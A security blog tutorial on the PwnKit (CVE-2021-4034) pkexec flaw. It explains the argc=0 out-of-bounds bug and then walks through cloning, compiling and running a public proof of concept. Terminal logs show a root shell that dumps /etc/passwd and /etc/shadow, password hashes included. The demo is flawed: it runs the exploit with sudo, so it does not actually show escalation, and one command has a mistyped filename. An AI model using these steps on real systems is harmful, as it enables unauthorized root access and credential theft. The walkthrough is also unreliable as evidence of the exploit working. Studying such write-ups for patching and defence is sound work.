Define Polkit pkexec for Linux
Polkit, previously known as PolicyKit, polkit is a
system service installed by default on many Linux distributions. It’s
used by systemd, so any Linux distribution that uses systemd also uses
polkit. The vulnerability resides within polkit's pkexec, a SUID-root program
that's installed by default on all major Linux distributions. Designated
CVE-2021-4034, the vulnerability has been given a CVSS score of 7.8.
OR
Polkit
is a component for controlling system-wide privileges in Unix-like operating
systems. It provides an organized way for non-privileged processes to
communicate with privileged processes. It is also possible to use polkit to
execute commands with elevated privileges using the command pkexec followed by
the command intended to be executed (with root permission). The vulnerability
found in pkexec allows an unprivileged local attacker to escalate privileges,
bypassing any authentication and policies due to incorrect handling of the
process’s argument vector.
Bharat Jogi, director of vulnerability and threat research at Qualys
CVE-2021-4034 (PWNKIT)
A memory corruption vulnerability in polkit's
pkexec, which allows any unprivileged user to gain full root privileges on a
vulnerable system using default polkit configuration
Potential Impact of PwnKit Vulnerability
Successful exploitation of this vulnerability allows any unprivileged
user to gain root privileges on the vulnerable host. Qualys security
researchers have been able to independently verify the vulnerability, develop
an exploit, and obtain full root privileges on default installations of
Ubuntu, Debian, Fedora, and CentOS. Other Linux distributions are likely
vulnerable and probably exploitable. This vulnerability has been hiding in
plain sight for 12+ years and affects all versions of pkexec since its first
version in May 2009 (commit c8c3d83, “Add a pkexec(1) command”).
Technical Details of PwnKit Vulnerability
What follows is an explanation of how the PwnKit vulnerability works.
The beginning of pkexec’s main() function processes the command-line arguments (lines 534-568), and searches for the program to be executed, if its path is not absolute, in the directories of the PATH environment variable (lines 610-640):
------------------------------------------------------------------------ 435 main (int argc, char *argv[]) 436 { ... 534 for (n = 1; n < (guint) argc; n++) 535 { ... 568 } ... 610 path = g_strdup (argv[n]); ... 629 if (path[0] != '/') 630 { ... 632 s = g_find_program_in_path (path); ... 639 argv[n] = path = s; 640 } ------------------------------------------------------------------------
Unfortunately, if the number of command-line arguments argc is 0 –
which means if the argument list argv that we pass to execve() is
empty, i.e. {NULL} – then argv[0] is NULL. This is the argument list’s terminator.
Therefore:
- at line 534, the integer n is permanently set to 1;
- at line 610, the pointer path is read out-of-bounds from argv[1];
- at line 639, the pointer s is written out-of-bounds to argv[1].
But what exactly is read from and written to this out-of-bounds
argv[1]?
To answer this question, we must digress briefly. When we
execve() a new program, the kernel copies our argument,
environment strings, and pointers (argv and envp) to the end of
the new program’s stack; for example:
|---------+---------+-----+------------|---------+---------+-----+------------| | argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] | |----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------| V V V V V V "program" "-option" NULL "value" "PATH=name" NULL
Clearly, because the argv and envp pointers are contiguous in
memory, if argc is 0, then the out-of-bounds argv[1] is actually
envp[0], the pointer to our first environment variable, “value”. Consequently:
-
At line 610, the path of the program to be executed is read out-of-bounds
from argv[1] (i.e. envp[0]), and points to “value”;
-
At line 632, this path “value” is passed to
g_find_program_in_path() (because “value” does not start with a
slash, at line 629);
-
Then, g_find_program_in_path() searches for an executable file named
“value” in the directories of our PATH environment variable;
-
If such an executable file is found, its full path is returned to
pkexec’s main() function (at line 632);
- Finally, at line 639, this full path is written out-of-bounds to argv[1] (i.e. envp[0]), thus overwriting our first environment variable.
So, stated more precisely:
- If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an executable file named “value”, then a pointer to the string “name/value” is written out-of-bounds to envp[0];
OR
- If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the string “name=./value” is written out-of-bounds to envp[0].
- In other words, this out-of-bounds write allows us to re-introduce an “unsecure” environment variable (for example, LD_PRELOAD) into pkexec’s environment. These “unsecure” variables are normally removed (by ld.so) from the environment of SUID programs before the main() function is called. We will exploit this powerful primitive in the following section.
- Last-minute note: polkit also supports non-Linux operating systems such as Solaris and *BSD, but we have not investigated their exploitability. However, we note that OpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0.
PKEXEC Status
Before exploiting we will polkit status if status is inactive (disabl)
so you can active this service and then exploit it. Ok!!
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ service polkit status ○ polkit.service - Authorization Manager Loaded: loaded (/lib/systemd/system/polkit.service; static) Active: inactive (dead) since Sat 2022-01-29 20:51:12 IST; 4s ago Docs: man:polkit(8) Process: 592 ExecStart=/usr/libexec/polkitd --no-debug (code=killed, signal=TERM) Main PID: 592 (code=killed, signal=TERM) CPU: 464ms Warning: some journal files were not opened due to insufficient permissions. ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ 3 ⨯ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ #www.kumaratuljaiswal.in 3 ⨯ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ service polkit start 5 ⨯ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ service polkit status ● polkit.service - Authorization Manager Loaded: loaded (/lib/systemd/system/polkit.service; static) Active: active (running) since Sat 2022-01-29 20:51:47 IST; 2min 48s ago Docs: man:polkit(8) Main PID: 39703 (polkitd) Tasks: 3 (limit: 4366) Memory: 7.3M CPU: 1.412s CGroup: /system.slice/polkit.service └─39703 /usr/libexec/polkitd --no-debug ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$
Now we clone a github repo and exploitation code (c languag) too, so lets start
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
ls
gcc cve-202-4034-poc.c -o poc-hackingtruth.org (compile)
./poc-hackingtruth.org
# as you can see that below the output even you can say that after exploitation you can do everything without password.
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp] └─$ sudo git clone https://github.com/arthepsy/CVE-2021-4034.git Cloning into 'CVE-2021-4034'... remote: Enumerating objects: 18, done. remote: Counting objects: 100% (18/18), done. remote: Compressing objects: 100% (17/17), done. remote: Total 18 (delta 4), reused 7 (delta 0), pack-reused 0 Receiving objects: 100% (18/18), 4.28 KiB | 115.00 KiB/s, done. Resolving deltas: 100% (4/4), done. ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp] └─$ cd CVE-2021-4034 ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ls cve-2021-4034-poc.c README.md ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ls cve-2021-4034-poc.c README.md ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ sudo gcc cve-2021-4034-poc.c -o poc-hackingtruth.org ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034] └─$ sudo ./poc-hackingtruth.org # # whoami root # pwd /tmp/CVE-2021-4034 # # cat /etc/passwd root:x:0:1006:root:/root:/bin/zsh daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:104:110:MySQL Server,,,:/nonexistent:/bin/false tss:x:105:111:TPM software stack,,,:/var/lib/tpm:/bin/false strongswan:x:106:65534::/var/lib/strongswan:/usr/sbin/nologin ntp:x:107:112::/nonexistent:/usr/sbin/nologin messagebus:x:108:113::/nonexistent:/usr/sbin/nologin redsocks:x:109:114::/var/run/redsocks:/usr/sbin/nologin rwhod:x:110:65534::/var/spool/rwho:/usr/sbin/nologin iodine:x:111:65534::/run/iodine:/usr/sbin/nologin miredo:x:112:65534::/var/run/miredo:/usr/sbin/nologin usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin tcpdump:x:114:119::/nonexistent:/usr/sbin/nologin rtkit:x:115:120:RealtimeKit,,,:/proc:/usr/sbin/nologin _rpc:x:116:65534::/run/rpcbind:/usr/sbin/nologin Debian-snmp:x:117:122::/var/lib/snmp:/bin/false statd:x:118:65534::/var/lib/nfs:/usr/sbin/nologin postgres:x:119:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash stunnel4:x:120:126::/var/run/stunnel4:/usr/sbin/nologin sshd:x:121:65534::/run/sshd:/usr/sbin/nologin sslh:x:122:127::/nonexistent:/usr/sbin/nologin avahi:x:123:128:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin nm-openvpn:x:124:129:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin nm-openconnect:x:125:130:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin pulse:x:126:132:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin saned:x:127:134::/var/lib/saned:/usr/sbin/nologin inetsim:x:128:136::/var/lib/inetsim:/usr/sbin/nologin colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin lightdm:x:131:139:Light Display Manager:/var/lib/lightdm:/bin/false king-phisher:x:132:140::/var/lib/king-phisher:/usr/sbin/nologin hackerboy:x:1000:0:hackerboy,,,:/home/hackerboy:/bin/zsh systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin varnish:x:998:1001::/home/varnish:/bin/sh _dnscrypt-proxy:x:133:65534::/run/dnscrypt-proxy:/usr/sbin/nologin debian-tor:x:134:142::/var/lib/tor:/bin/false Debian-exim:x:135:143::/var/spool/exim4:/usr/sbin/nologin redis:x:136:144::/var/lib/redis:/usr/sbin/nologin _gvm:x:137:145::/var/lib/openvas:/usr/sbin/nologin ak:x:1002:1003::/home/ak:/bin/sh/nologin speech-dispatcher:x:138:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false hackingtruth.in:x:1003:1004::/home/hackingtruth.in:/usr/bin/zsh bind:x:139:147::/var/cache/bind:/usr/sbin/nologin arpwatch:x:140:149:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh arpalert:x:141:150:ARP Alerter,,,:/var/lib/arpalert:/bin/sh hackingtruth:x:1004:1007:Hacking Truth,,,:/home/hackingtruth:/bin/bash # # cat /etc/shadow root:!:18580:0:99999:7::: daemon:*:18580:0:99999:7::: bin:*:18580:0:99999:7::: sys:*:18580:0:99999:7::: sync:*:18580:0:99999:7::: games:*:18580:0:99999:7::: man:*:18580:0:99999:7::: lp:*:18580:0:99999:7::: mail:*:18580:0:99999:7::: news:*:18580:0:99999:7::: uucp:*:18580:0:99999:7::: proxy:*:18580:0:99999:7::: www-data:*:18580:0:99999:7::: backup:*:18580:0:99999:7::: list:*:18580:0:99999:7::: irc:*:18580:0:99999:7::: gnats:*:18580:0:99999:7::: nobody:*:18580:0:99999:7::: _apt:*:18580:0:99999:7::: systemd-timesync:*:18580:0:99999:7::: systemd-network:*:18580:0:99999:7::: systemd-resolve:*:18580:0:99999:7::: mysql:!:18580:0:99999:7::: tss:*:18580:0:99999:7::: strongswan:*:18580:0:99999:7::: ntp:*:18580:0:99999:7::: messagebus:*:18580:0:99999:7::: redsocks:!:18580:0:99999:7::: rwhod:*:18580:0:99999:7::: iodine:*:18580:0:99999:7::: miredo:*:18580:0:99999:7::: usbmux:*:18580:0:99999:7::: tcpdump:*:18580:0:99999:7::: rtkit:*:18580:0:99999:7::: _rpc:*:18580:0:99999:7::: Debian-snmp:!:18580:0:99999:7::: statd:*:18580:0:99999:7::: postgres:*:18580:0:99999:7::: stunnel4:!:18580:0:99999:7::: sshd:*:18580:0:99999:7::: sslh:!:18580:0:99999:7::: avahi:*:18580:0:99999:7::: nm-openvpn:*:18580:0:99999:7::: nm-openconnect:*:18580:0:99999:7::: pulse:*:18580:0:99999:7::: saned:*:18580:0:99999:7::: inetsim:*:18580:0:99999:7::: colord:*:18580:0:99999:7::: geoclue:*:18580:0:99999:7::: lightdm:*:18580:0:99999:7::: king-phisher:*:18580:0:99999:7::: hackerboy:$6$V4AmnlsIDSMADZL8$VobM/vkZr.CJaNQVTdyG4mucSuFGxKWRvp6WNGcVzP9LhM1E8POaXgJtNaA6gVQHHw2U9kiWOhG.RULLTOnlP.:18580:0:99999:7::: systemd-coredump:!!:18580:::::: varnish:!:18584:::::: _dnscrypt-proxy:*:18585:0:99999:7::: debian-tor:*:18585:0:99999:7::: Debian-exim:!:18585:0:99999:7::: redis:*:18591:0:99999:7::: _gvm:*:18591:0:99999:7::: atul:$6$.vXPlfqF.o9ndfs.$/ntvls/aXetm0A9t195IMofFM7.JbpeP1ap1NCdLc.SioqU.IRHQJBfpq9Uhz3H24r04I5qKiSR3K1c.5a9YW/:18606:0:99999:7::: ak:!:18655:0:99999:7::: speech-dispatcher:!:18717:0:99999:7::: hackingtruth.in:$y$j9T$OVuph05EYKkkAVp1H/2KX1$C4BuqeXw8qX7aHnjC04B9okGLEnyB3nwE1NzgrYhZI5:18774:0:99999:7::: bind:*:18969:0:99999:7::: arpwatch:!:19015:0:99999:7::: arpalert:!:19018:0:99999:7::: hackingtruth:$5$uhQ4C3rvltiS0QWL$kp/DMGNbaG62u0k9zTPegWqhEy5/ZsxKsZyn9hrAkq/:19019:0:99999:7::: #
# whoami root # # apt-get install libglib2.0-dev Reading package lists... Done Building dependency tree... Done Reading state information... Done Suggested packages: libgirepository1.0-dev libglib2.0-doc The following NEW packages will be installed: libglib2.0-dev 0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded. Need to get 0 B/1601 kB of archives. After this operation, 10.2 MB of additional disk space will be used. debconf: unable to initialize frontend: Dialog debconf: (TERM is not set, so the dialog frontend is not usable.) debconf: falling back to frontend: Readline Selecting previously unselected package libglib2.0-dev:amd64. (Reading database ... 430513 files and directories currently installed.) Preparing to unpack .../libglib2.0-dev_2.70.2-1_amd64.deb ... Unpacking libglib2.0-dev:amd64 (2.70.2-1) ... Setting up libglib2.0-dev:amd64 (2.70.2-1) ... Processing triggers for libglib2.0-0:amd64 (2.70.2-1) ... GLib: Cannot convert message: Conversion from character set “UTF-8” to “PWNKIT” is not supported Usage: gdbus call [OPTION…] Invoke a method on a remote object. Connection Endpoint Options: -y, --system Connect to the system bus -e, --session Connect to the session bus -a, --address Connect to given D-Bus address Application Options: -d, --dest Destination name to invoke method on -o, --object-path Object path to invoke method on -m, --method Method and interface name -t, --timeout Timeout in seconds # www.hackingtruth.org
Thanks qualys for your support :-)
I hope you liked this post, then you should not forget to share this post at
all.
Thank you so much :-)
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.